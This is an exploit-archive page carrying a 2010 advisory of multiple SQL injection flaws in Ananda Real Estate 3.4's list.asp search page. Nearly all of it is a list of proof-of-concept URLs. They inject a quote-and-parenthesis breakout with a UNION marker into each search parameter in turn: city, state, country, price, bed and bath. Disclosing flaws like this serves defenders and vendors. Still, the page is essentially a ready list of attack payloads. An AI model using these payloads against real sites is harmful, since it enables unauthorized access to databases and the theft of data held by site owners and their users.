Ananda Real Estate 3.4 (list.asp) Multiple SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ananda Real Estate 3.4 (list.asp) Multiple SQL Injection
# Published : 2010-12-02
# Author : underground-stockholm.com
# Previous Title : AuraCMS (pfd.php) SQL Injection Vulnerability
# Next Title : Etomite 1.1 Multiple Vulnerabilities

TITLE: Ananda Real Estate "list.asp" Multiple SQL Injection Vulnerabilities
PRODUCT: Ananda Real Estate 3.4
PRODUCT URL: http://www.softwebsnepal.com/website_design_realestate.htm
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/

BUGS:

http://[host]/[path]/list.asp?city=%27%29%29+union+insect&state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=%27%29%29+union+insect&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=%27%29%29+union+insect&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=%27%29%29+union+insect&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=%27%29%29+union+insect&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=&search=yes&bed=%27%29%29+union+insect&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=&search=yes&bed=&bath=%27%29%29+union+insect&Submit=Search+Now!